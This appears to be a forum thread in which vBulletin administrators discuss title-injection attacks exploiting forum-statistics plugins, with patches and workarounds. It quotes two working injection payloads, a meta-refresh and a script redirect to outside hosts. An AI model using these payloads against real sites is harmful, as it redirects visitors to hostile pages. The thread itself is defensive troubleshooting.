ok. so for the last two days I have been getting one or more people signing up on my vbulletin who post the following line in the title and body:

">"">>>><meta http-equiv="Refresh" content="0;url=http://clubplus.pl/"> """" >

once they post this, the website basically redirects to the website in the url.

i have been looking for where to turn the HTML off in the title,but I can't find it. Can someone help me out in stopping this from happening? are there any fixes anywhere out there to prevent this from happening?

I am running vbb 3.5.4. Thanks guys!

Hello,

That is from the following modification:

https://vborg.vbsupport.ru/showthread.php?t=93065

A fix has been applied by staff, so please update to the most recent version.

thanks....i'll give it a try..reading the thread now. BTW...is this the correct place to list something like this if it should happen again with something different? i couldn't find a place other than in off-topic to post this...

Well currently, this is the correct place. :)

ok...so I didn't have top x installed to begin with....i thought I did, but I actually have cyb top poster installed. could it be a similar problem?

This news should be shown on vb.org's main page.

You have html enabled on your forums? Sorry, I didn't read it correctly. But then that may be a vBulletin issue. I would disable HTML on your forums then...and I will take a look at the mod you mentioned right now...

naw, html wans't enabled. I found the fix for the cyb one as well...top x stats as well as the cyb advanced forum statistics both have this vulnerability. the new version of cyb advanced forum statistics also deals with this issue.

I installed the updated version over my old one, and it appears to have fixed the problem. I undeleted the hacked post, and it doesnt' redirect anymore, so apparently the new version works.

For anyone who has not yet installed the new version of top x stats or cyb advanced forum statistics, I suggest you do so, else your site may be vulnerable to this attack one day in the future.

Thanks for everyone's help!

Okay seems like that modification was patched about a week ago. Thanks for the info.

ok...well, i thought this fixed it...apparently it didn't. Even after I checked and double-checked the other day to fix it, it still isn't working. my site still redirects, but this time to a hacked page.

I just now deleted the thread and everyone now does not get redirected, EXCEPT my admin screen name. any ideas guys?

it redirected me to this site:
http://walnan.freehostia.com/

ok...i just disabled the cyb advanced forum statistics, and now it does not redirect me. so apparently the new update didn't fix it?

where can I check to see if html is disabled or not?

Have you let cyb know ???

i posted it in his thread....for this hack I mean...i dind't PM him or anything though

--------------
AHHHH!!! someone tried it AGAIN while i was sitting there blocking everything. luckily i disabled the plugin and nothing happened, but here's the line of text they used this time...i'm a lil scared to find out what that would have done, since it was executing a script file:

">"">>>><script>location="http://intikam.us/hck"</script> """" >

You need to delete the Thread title when deleting the post... Edit it and make it so that the redirect isn't there anymore and this will end your admin being redirected. Somewhere you have HTML on...

I've had this happen as well. What I don't understand is why people even bother doing this? It's the stupidest thing. What an enormous waste of their time to search out all these boards, register and then post this stupid title. All a person has to do is delete the stupid post and it's fixed. <sarcasm>Wow, those hackers are pretty smart, I know I'm impressed. </sarcasm> *rolling eyes* Sorry, just needed to rant there for a second about these little twits making our lives more difficult.

Anyway, I found a thread on here the other day about this where someone suggested to add that string they are using to the list of censored words and so I did that since it seemed like the quickest way to deal with this. So far, that has worked like a charm. I had one this morning actually, it ended up being a few of these ">"">> and then a whole bunch of these ************. So, it didn't work for them. Hehe.

Just moderate new users. They post as soon as they have activated the email, so the posts end up in a moderation queue. Then all you have to do is delete ;)

Adding words to a censored list will only stop this variant of attack, it wont stop html being used in the first place - therefore the vulnerability is still open !!!!!!

Just moderate new users. They post as soon as they have activated the email, so the posts end up in a moderation queue. Then all you have to do is delete ;)

Adding words to a censored list will only stop this variant of attack, it wont stop html being used in the first place - therefore the vulnerability is still open !!!!!!

Or at least have it censor the carats >><<

What if you add html phrases to your censors. Example maybe html, .exe, ect... That might actually work. I found the best way to stop stuff like this is set user registration to admin and pay attention to their email address if it looks fishy dont activate their account.